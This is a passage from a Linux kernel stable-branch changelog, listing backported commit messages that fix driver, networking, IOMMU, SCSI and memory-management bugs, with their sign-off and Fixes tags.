Fixes: 45fb6b6f2a ("ASoC: sunxi: add support for the on-chip codec on
early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d13f62d93 upstream.
skl_probe() releases a runtime pm ref unconditionally wheras
skl_remove() acquires one only if the device is wakeup capable.
Thus if the device is not wakeup capable, unloading and reloading
the module will result in the refcount being decreased below 0.
Fix it.
Fixes: d8c2dab838 ("ASoC: Intel: Add Skylake HDA audio driver")
Signed-off-by: Lukas Wunner <lukas@wunner.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c7e9d39831 upstream.
Sylvain Lemieux reports the LPC32xx GPIO driver is broken since
commit 762c2e46c0 ("gpio: of: remove of_gpiochip_and_xlate() and
struct gg_data"). Probably, gpio-etraxfs.c and gpio-davinci.c are
broken too.
Those drivers register multiple gpio_chip that are associated to a
single OF node, and their own .of_xlate() checks if the passed
gpio_chip is valid.
Now, the problem is of_find_gpiochip_by_node() returns the first
gpio_chip found to match the given node. So, .of_xlate() fails,
except for the first GPIO bank.
Reverting the commit could be a solution, but I do not want to go
back to the mess of struct gg_data. Another solution here is to
take the match by a node pointer and the success of .of_xlate().
It is a bit clumsy to call .of_xlate twice; for gpio_chip matching
and for really getting the gpio_desc index. Perhaps, our long-term
goal might be to convert the drivers to single chip registration,
but this commit will solve the problem until then.
Fixes: 762c2e46c0 ("gpio: of: remove of_gpiochip_and_xlate() and struct gg_data")
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Reported-by: Sylvain Lemieux <slemieux.tyco@gmail.com>
Tested-by: David Lechner <david@lechnology.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 812d47889a upstream.
This fixes the irq allocation in this driver to not print:
irq: Cannot allocate irq_descs @ IRQ34, assuming pre-allocated
irq: Cannot allocate irq_descs @ IRQ66, assuming pre-allocated
Which happens because the driver already called irq_alloc_descs()
and so the change to use irq_domain_add_simple resulted in calling
irq_alloc_descs() twice.
Modernize the irq allocation in this driver to use the
irq_domain_add_linear flow directly and eliminate the use of
irq_domain_add_simple/legacy
Fixes: ce931f571b ("gpio/mvebu: convert to use irq_domain_add_simple()")
Signed-off-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9ca488dd53 upstream.
The batadv_hard_iface::neigh_list is accessed via rcu based primitives.
Thus all operations done on it have to fulfill the requirements by RCU. So
using non-RCU mechanisms like hlist_add_head is not allowed because it
misses the barriers required to protect concurrent readers when accessing
the data behind the pointer.
Fixes: cef63419f7 ("batman-adv: add list of unique single hop neighbors per hard-interface")
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 98756f5319 upstream.
Commit 103544d869 ("ACPI,PCI,IRQ: reduce resource requirements")
replaced the addition of PIRQ_PENALTY_PCI_USING in acpi_pci_link_allocate()
with an addition in acpi_irq_pci_sharing_penalty(), but f7eca374f0
("ACPI,PCI,IRQ: separate ISA penalty calculation") removed the use
of acpi_irq_pci_sharing_penalty() for ISA IRQs.
Therefore, PIRQ_PENALTY_PCI_USING is missing from ISA IRQs used by
interrupt links. Include that penalty by adding it in the
acpi_pci_link_allocate() path.
Fixes: f7eca374f0 (ACPI,PCI,IRQ: separate ISA penalty calculation)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f1caa61df2 upstream.
Ondrej reported that IRQs stopped working in v4.7 on several
platforms. A typical scenario, from Ondrej's VT82C694X/694X, is:
ACPI: Using PIC for interrupt routing
ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15)
ACPI: No IRQ available for PCI Interrupt Link [LNKA]
8139too 0000:00:0f.0: PCI INT A: no GSI
We're using PIC routing, so acpi_irq_balance == 0, and LNKA is already
active at IRQ 11. In that case, acpi_pci_link_allocate() only tries
to use the active IRQ (IRQ 11) which also happens to be the SCI.
We should penalize the SCI by PIRQ_PENALTY_PCI_USING, but
irq_get_trigger_type(11) returns something other than
IRQ_TYPE_LEVEL_LOW, so we penalize it by PIRQ_PENALTY_ISA_ALWAYS
instead, which makes acpi_pci_link_allocate() assume the IRQ isn't
available and give up.
Add acpi_penalize_sci_irq() so platforms can tell us the SCI IRQ,
trigger, and polarity directly and we don't have to depend on
irq_get_trigger_type().
Fixes: 103544d869 (ACPI,PCI,IRQ: reduce resource requirements)
Link: http://lkml.kernel.org/r/201609251512.05657.linux@rainbow-software.org
Reported-by: Ondrej Zary <linux@rainbow-software.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit eeaed4bb5a upstream.
We do not want to store the SCI penalty in the acpi_isa_irq_penalty[]
table because acpi_isa_irq_penalty[] only holds ISA IRQ penalties and
there's no guarantee that the SCI is an ISA IRQ. We add in the SCI
penalty as a special case in acpi_irq_get_penalty().
But if we called acpi_penalize_isa_irq() or acpi_irq_penalty_update()
for an SCI that happened to be an ISA IRQ, they stored the SCI
penalty (part of the acpi_irq_get_penalty() return value) in
acpi_isa_irq_penalty[]. Subsequent calls to acpi_irq_get_penalty()
returned a penalty that included *two* SCI penalties.
Fixes: 103544d869 (ACPI,PCI,IRQ: reduce resource requirements)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d4952d9d9 upstream.
hw_random carefully avoids using a stack buffer except in
add_early_randomness(). This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.
Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes: d3cc799647 ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 62e931fac4 upstream.
gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.
The shortcut
if (size > atomic_read(&chunk->avail))
continue;
makes the loop skip over chunks that do not have enough bytes left to
fulfill the request. There are two situations, though, where an
allocation might still fail:
(1) The available memory is not contiguous, i.e. the request cannot
be fulfilled due to external fragmentation.
(2) A race condition. Another thread runs the same code concurrently
and is quicker to grab the available memory.
In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed. This return value is then assigned to
start_bit. The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched. Today, the code fails to reset start_bit to 0. As a
result, prefixes of subsequent chunks are ignored. Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
Fixes: 7f184275aa ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d0208639db upstream.
Before merging all different stack tracers the call traces printed had
an indicator if an entry can be considered reliable or not.
Unreliable entries were put in braces, reliable not. Currently all
lines contain these extra braces.
This patch restores the old behaviour by adding an extra "reliable"
parameter to the callback functions. Only show_trace makes currently
use of it.
Before:
[ 0.804751] Call Trace:
[ 0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[ 0.804756] ([<0000000000161d64>] create_worker+0x174/0x1c0)
After:
[ 0.804751] Call Trace:
[ 0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[ 0.804756] [<0000000000161d64>] create_worker+0x174/0x1c0
Fixes: 758d39ebd3 ("s390/dumpstack: merge all four stack tracers")
Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 83ab7dad06 upstream.
It is likely that checking the result of 'pcf2123_write_reg' is expected
here.
Also fix a small style issue. The '{' at the beginning of the function
is misplaced.
Fixes: 809b453b76 ("rtc: pcf2123: clean up writes to the rtc chip")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Signed-off-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 34b89b2967 upstream.
If the driver is built as a module, autoload won't work because the module
alias information is not filled. So user-space can't match the registered
device with the corresponding module.
Export the module alias information using the MODULE_DEVICE_TABLE() macro.
Before this patch:
$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias: platform:exynos-audss-clk
After this patch:
$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias: platform:exynos-audss-clk
alias: of:N*T*Csamsung,exynos5420-audss-clockC*
alias: of:N*T*Csamsung,exynos5420-audss-clock
alias: of:N*T*Csamsung,exynos5410-audss-clockC*
alias: of:N*T*Csamsung,exynos5410-audss-clock
alias: of:N*T*Csamsung,exynos5250-audss-clockC*
alias: of:N*T*Csamsung,exynos5250-audss-clock
alias: of:N*T*Csamsung,exynos4210-audss-clockC*
alias: of:N*T*Csamsung,exynos4210-audss-clock
Fixes: 4d252fd571 ("clk: samsung: Allow modular build of the Audio Subsystem CLKCON driver")
Signed-off-by: Javier Martinez Canillas <javier@osg.samsung.com>
Reviewed-by: Krzysztof Kozlowski <krzk@kernel.org>
Tested-by: Krzysztof Kozlowski <krzk@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5938768388 upstream.
struct clocksource is also used by the clk notifier callback, to
unregister and re-register the clocksource with a different clock rate.
clocksource_mmio_init does not pass back a pointer to the struct used,
and the clk notifier callback assumes that the struct clocksource in
struct sun5i_timer_clksrc is valid. This results in a kernel NULL
pointer dereference when the hstimer clock is changed:
Unable to handle kernel NULL pointer dereference at virtual address 00000004
[<c03a4678>] (clocksource_unbind) from [<c03a46d4>] (clocksource_unregister+0x2c/0x44)
[<c03a46d4>] (clocksource_unregister) from [<c0a6f350>] (sun5i_rate_cb_clksrc+0x34/0x3c)
[<c0a6f350>] (sun5i_rate_cb_clksrc) from [<c035ea50>] (notifier_call_chain+0x44/0x84)
[<c035ea50>] (notifier_call_chain) from [<c035edc0>] (__srcu_notifier_call_chain+0x44/0x60)
[<c035edc0>] (__srcu_notifier_call_chain) from [<c035edf4>] (srcu_notifier_call_chain+0x18/0x20)
[<c035edf4>] (srcu_notifier_call_chain) from [<c0670174>] (__clk_notify+0x70/0x7c)
[<c0670174>] (__clk_notify) from [<c06702c0>] (clk_propagate_rate_change+0xa4/0xc4)
[<c06702c0>] (clk_propagate_rate_change) from [<c0670288>] (clk_propagate_rate_change+0x6c/0xc4)
Revert the commit for now. clocksource_mmio_init can be made to pass back
a pointer, but the code churn and usage of an inner struct might not be
worth it.
Fixes: 157dfadef8 ("clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init")
Reported-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Cc: linux-sunxi@googlegroups.com
Cc: Daniel Lezcano <daniel.lezcano@linaro.org>
Cc: linux-arm-kernel@lists.infradead.org
Link: http://lkml.kernel.org/r/20161018054918.26855-1-wens@csie.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7065906096 upstream.
The driver was decrementing the online_queues prior to attempting to
delete those IO queues, so the driver ended up not requesting the
controller delete any. This patch saves the online_queues prior to
suspending them, and adds that parameter for deleting io queues.
Fixes: c21377f8 ("nvme: Suspend all queues before deletion")
Signed-off-by: Keith Busch <keith.busch@intel.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cace564f8b upstream.
The ctxt's count field is overloaded to mean the number of pages in
the ctxt->page array and the number of SGEs in the ctxt->sge array.
Typically these two numbers are the same.
However, when an inline RPC reply is constructed from an xdr_buf
with a tail iovec, the head and tail often occupy the same page,
but each are DMA mapped independently. In that case, ->count equals
the number of pages, but it does not equal the number of SGEs.
There's one more SGE, for the tail iovec. Hence there is one more
DMA mapping than there are pages in the ctxt->page array.
This isn't a real problem until the server's iommu is enabled. Then
each RPC reply that has content in that iovec orphans a DMA mapping
that consists of real resources.
krb5i and krb5p always populate that tail iovec. After a couple
million sent krb5i/p RPC replies, the NFS server starts behaving
erratically. Reboot is needed to clear the problem.
Fixes: 9d11b51ce7 ("svcrdma: Fix send_reply() scatter/gather set-up")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9995237bba upstream.
Message from syslogd@klimt at Aug 18 17:00:37 ...
kernel:page:ffffea0020639b00 count:0 mapcount:0 mapping: (null) index:0x0
Aug 18 17:00:37 klimt kernel: flags: 0x2fffff80000000()
Aug 18 17:00:37 klimt kernel: page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)
Aug 18 17:00:37 klimt kernel: kernel BUG at /home/cel/src/linux/linux-2.6/include/linux/mm.h:445!
Aug 18 17:00:37 klimt kernel: RIP: 0010:[<ffffffffa05c21c1>] svc_rdma_sendto+0x641/0x820 [rpcrdma]
send_reply() assigns its page argument as the first page of ctxt. On
error, send_reply() already invokes svc_rdma_put_context(ctxt, 1);
which does a put_page() on that very page. No need to do that again
as svc_rdma_sendto exits.
Fixes: 3e1eeb9808 ("svcrdma: Close connection when a send error occurs")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 582ab27a06 upstream.
NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.
That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2
Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57
Fixes: 59fcd7c63a (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 261d7794c4 upstream.
Instantiating the rmi4 I2C transport driver without interrupts assigned
(for example using manual i2c instantiation from the command line)
caused the driver to fail to load, but it does not clean up its regulator
or transport device registrations. Result is a crash at a later time,
for example when rebooting the system.
Fixes: 946c8432aa ("Input: synaptics-rmi4 - support regulator supplies")
Cc: Bjorn Andersson <bjorn.andersson@linaro.org>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bbc2ceeb32 upstream.
Instantiating the rmi4 SPI transport driver without an interrupt assigned
caused the driver to fail to load, but it does not clean up its transport
device registration. Result may be a crash at a later time, for example
when rebooting the system.
Fixes: 8d99758dee ("Input: synaptics-rmi4 - add SPI transport driver")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2e91838bf7 upstream.
Coverity reports:
Passing argument 152UL /* sizeof (*wdd) */ to function __devres_alloc_node
and then casting the return value to struct watchdog_device ** is
suspicious.
Allocation size needs to be sizeof(*rcwdd), not sizeof(*wdd).
Fixes: 83fbae5a14 ("watchdog: Add a device managed API for ...")
Cc: Neil Armstrong <narmstrong@baylibre.com>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Neil Armstrong <narmstrong@baylibre.com>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bea64033dd upstream.
It turns out that the disable_dmar_iommu() code-path tried
to get the device_domain_lock recursivly, which will
dead-lock when this code runs on dmar removal. Fix both
code-paths that could lead to the dead-lock.
Fixes: 55d940430a ('iommu/vt-d: Get rid of domain->iommu_lock')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c3db901c54 upstream.
The current code missed freeing domain id when free a domain of
struct dma_ops_domain.
Signed-off-by: Baoquan He <bhe@redhat.com>
Fixes: ec487d1a11 ('x86, AMD IOMMU: add domain allocation and deallocation functions')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 62bdf94a20 upstream.
When a LOCALINV WR is flushed, the frmr is marked STALE, then
frwr_op_unmap_sync DMA-unmaps the frmr's SGL. These STALE frmrs
are then recovered when frwr_op_map hunts for an INVALID frmr to
use.
All other cases that need frmr recovery leave that SGL DMA-mapped.
The FRMR recovery path unconditionally DMA-unmaps the frmr's SGL.
To avoid DMA unmapping the SGL twice for flushed LOCAL_INV WRs,
alter the recovery logic (rather than the hot frwr_op_unmap_sync
path) to distinguish among these cases. This solution also takes
care of the case where multiple LOCAL_INV WRs are issued for the
same rpcrdma_req, some complete successfully, but some are flushed.
Reported-by: Vasco Steinmetz <linux@kyberraum.net>
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Vasco Steinmetz <linux@kyberraum.net>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a053fb7e51 upstream.
To free fences, call_rcu() is used, which calls amd_sched_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so sched_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.
Fix it with a rcu_barrier().
Fixes: 189e0fb763 ("drm/amdgpu: RCU protected amd_sched_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9bcffe7575 upstream.
After commit 1cf6e8fc83 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), the hardware handshake wasn't
functional anymore on Atmel platforms (beside SAMA5D2).
To understand why, one has to understand the flag ATMEL_US_USMODE_HWHS
first:
Before commit 1cf6e8fc83 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), this flag was never set.
Thus, the CTS/RTS where only handled by serial_core (and everything
worked just fine).
This commit introduced the use of the ATMEL_US_USMODE_HWHS flag,
enabling it for all boards when the user space enables flow control.
When the ATMEL_US_USMODE_HWHS is set, the Atmel USART controller
handles a part of the flow control job:
- disable the transmitter when the CTS pin gets high.
- drive the RTS pin high when the DMA buffer transfer is completed or
PDC RX buffer full or RX FIFO is beyond threshold. (depending on the
controller version).
NB: This feature is *not* mandatory for the flow control to work.
(Nevertheless, it's very useful if low latencies are needed.)
Now, the specifics of the ATMEL_US_USMODE_HWHS flag:
- For platforms with DMAC and no FIFOs (sam9x25, sam9x35, sama5D3,
sama5D4, sam9g15, sam9g25, sam9g35)* this feature simply doesn't work.
( source: https://lkml.org/lkml/2016/9/7/598 )
Tested it on sam9g35, the RTS pins always stays up, even when RXEN=1
or a new DMA transfer descriptor is set.
=> ATMEL_US_USMODE_HWHS must not be used for those platforms
- For platforms with a PDC (sam926{0,1,3}, sam9g10, sam9g20, sam9g45,
sam9g46)*, there's another kind of problem. Once the flag
ATMEL_US_USMODE_HWHS is set, the RTS pin can't be driven anymore via
RTSEN/RTSDIS in USART Control Register. The RTS pin can only be driven
by enabling/disabling the receiver or setting RCR=RNCR=0 in the PDC
(Receive (Next) Counter Register).
=> Doing this is beyond the scope of this patch and could add other
bugs, so the original (and working) behaviour should be set for those
platforms (meaning ATMEL_US_USMODE_HWHS flag should be unset).
- For platforms with a FIFO (sama5d2)*, the RTS pin is driven according
to the RX FIFO thresholds, and can be also driven by RTSEN/RTSDIS in
USART Control Register. No problem here.
(This was the use case of commit 1cf6e8fc83 ("tty/serial: at91: fix
RTS line management when hardware handshake is enabled"))
NB: If the CTS pin declared as a GPIO in the DTS, (for instance
cts-gpios = <&pioA PIN_PB31 GPIO_ACTIVE_LOW>), the transmitter will be
disabled.
=> ATMEL_US_USMODE_HWHS flag can be set for this platform ONLY IF the
CTS pin is not a GPIO.
So, the only case when ATMEL_US_USMODE_HWHS can be enabled is when
(atmel_use_fifo(port) &&
!mctrl_gpio_to_gpiod(atmel_port->gpios, UART_GPIO_CTS))
Tested on all Atmel USART controller flavours:
AT91SAM9G35-CM (DMAC flavour), AT91SAM9G20-EK (PDC flavour),
SAMA5D2xplained (FIFO flavour).
* the list may not be exhaustive
Fixes: 1cf6e8fc83 ("tty/serial: at91: fix RTS line management when hardware handshake is enabled")
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Acked-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Acked-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
[nicolas.ferre@atmel.com: adapt to 4.4.x kernel for stable by adding
the atmel_port variable declaration which was missing]
Signed-off-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fbb21c5202 upstream.
According to BSpec, cdclk for BDW has to be not less than 432 MHz with DP
audio enabled, port width x4, and link rate HBR2 (5.4 GHz). With cdclk less
than 432 MHz, enabling audio leads to pipe FIFO underruns and displays
cycling on/off.
From BSpec:
"Display» BDW-SKL» dpr» [Register] DP_TP_CTL [BDW+,EXCLUDE(CHV)]
Workaround : Do not use DisplayPort with CDCLK less than 432 MHz, audio
enabled, port width x4, and link rate HBR2 (5.4 GHz), or else there may
be audio corruption or screen corruption."
Since, some DP configurations (e.g., MST) use port width x4 and HBR2
link rate, let's increase the cdclk to >= 432 MHz to enable audio for those
cases.
v4: Changed commit message
v3: Combine BDW pixel rate adjustments into a function (Jani)
v2: Restrict fix to BDW
Retain the set cdclk across modesets (Ville)
Signed-off-by: Dhinakaran Pandiyan <dhinakaran.pandiyan@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Reviewed-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1478026080-2925-1-git-send-email-dhinakaran.pandiyan@intel.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
(cherry picked from commit b30ce9e055)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
commit 112b0b8f8f upstream.
In our VGIC implementation we limit the number of SPIs to a number
that the userland application told us. Accordingly we limit the
allocation of memory for virtual IRQs to that number.
However in our MMIO dispatcher we didn't check if we ever access an
IRQ beyond that limit, leading to out-of-bound accesses.
Add a test against the number of allocated SPIs in check_region().
Adjust the VGIC_ADDR_TO_INT macro to avoid an actual division, which
is not implemented on ARM(32).
[maz: cleaned-up original patch]
Reviewed-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Andre Przywara <andre.przywara@arm.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit df3d422cba upstream.
The code at the end of alua_rtpg_work() is as follows:
scsi_device_put(sdev);
kref_put(&pg->kref, release_port_group);
In other words, alua_rtpg_queue() must hold an sdev reference and a pg
reference before queueing rtpg work. If no rtpg work is queued no
additional references should be held when alua_rtpg_queue() returns. If
no rtpg work is queued, ensure that alua_rtpg_queue() only gives up the
sdev reference if that reference was obtained by the same
alua_rtpg_queue() call.
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Reported-by: Tang Junhui <tang.junhui@zte.com.cn>
Cc: Hannes Reinecke <hare@suse.com>
Cc: Tang Junhui <tang.junhui@zte.com.cn>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1fdd14279e upstream.
Reference count of pg leaks in alua_rtpg_work() since kref_put() is not
called to decrease the reference count of pg when the condition
pg->rtpg_sdev==NULL satisfied (actually it is easy to satisfy), it would
cause memory of pg leakage.
Signed-off-by: tang.junhui <tang.junhui@zte.com.cn>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d3a56ed09 upstream.
While merging mpt3sas & mpt2sas code, we added the is_warpdrive check
condition on the wrong line
---------------------------------------------------------------------------
scsih_target_alloc(struct scsi_target *starget)
sas_target_priv_data->handle = raid_device->handle;
sas_target_priv_data->sas_address = raid_device->wwid;
sas_target_priv_data->flags |= MPT_TARGET_FLAGS_VOLUME;
- raid_device->starget = starget;
+ sas_target_priv_data->raid_device = raid_device;
+ if (ioc->is_warpdrive)
+ raid_device->starget = starget;
}
spin_unlock_irqrestore(&ioc->raid_device_lock, flags);
return 0;
------------------------------------------------------------------------------
That check should be for the line sas_target_priv_data->raid_device =
raid_device;
Due to above hunk, we are not initializing raid_device's starget for
raid volumes, and so during raid disk deletion driver is not calling
scsi_remove_target() API as driver observes starget field of
raid_device's structure as NULL.
Signed-off-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Fixes: 7786ab6aff ("mpt3sas: Ported WarpDrive product SSS6200 support")
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a5dd506e15 upstream.
A system can get hung task timeouts if a qlogic board fails during
initialization (if the board breaks again or fails the init). The hang
involves the scsi scan.
In a nutshell, since commit beb9e315e6 ("qla2xxx: Prevent removal and
board_disable race"):
...it is possible to have freed ha (base_vha->hw) early by a call to
qla2x00_remove_one when pdev->enable_cnt equals zero:
if (!atomic_read(&pdev->enable_cnt)) {
scsi_host_put(base_vha->host);
kfree(ha);
pci_set_drvdata(pdev, NULL);
return;
Almost always, the scsi_host_put above frees the vha structure
(attached to the end of the Scsi_Host we're putting) since it's the last
put, and life is good. However, if we are entering this routine because
the adapter has broken sometime during initialization AND a scsi scan is
already in progress (and has done its own scsi_host_get), vha will not
be freed. What's worse, the scsi scan will access the freed ha structure
through qla2xxx_scan_finished:
if (time > vha->hw->loop_reset_delay * HZ)
return 1;
The scsi scan keeps checking to see if a scan is complete by calling
qla2xxx_scan_finished. There is a timeout value that limits the length
of time a scan can take (hw->loop_reset_delay, usually set to 5
seconds), but this definition is in the data structure (hw) that can get
freed early.
This can yield unpredictable results, the worst of which is that the
scsi scan can hang indefinitely. This happens when the freed structure
gets reused and loop_reset_delay gets overwritten with garbage, which
the scan obliviously uses as its timeout value.
The fix for this is simple: at the top of qla2xxx_scan_finished, check
for the UNLOADING bit in the vha structure (_vha is not freed at this
point). If UNLOADING is set, we exit the scan for this adapter
immediately. After this last reference to the ha structure, we'll exit
the scan for this adapter, and continue on.
This problem is hard to hit, but I have run into it doing negative
testing many times now (with a test specifically designed to bring it
out), so I can verify that this fix works. My testing has been against a
RHEL7 driver variant, but the bug and patch are equally relevant to to
the upstream driver.
Fixes: beb9e315e6 ("qla2xxx: Prevent removal and board_disable race")
Signed-off-by: Bill Kuzeja <william.kuzeja@stratus.com>
Acked-by: Himanshu Madhani <himanshu.madhani@cavium.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d304286abb upstream.
fix scale configuration/parsing for h3lis331dl accel driver
when sensitivity is higher than 1(m/s^2)/digit
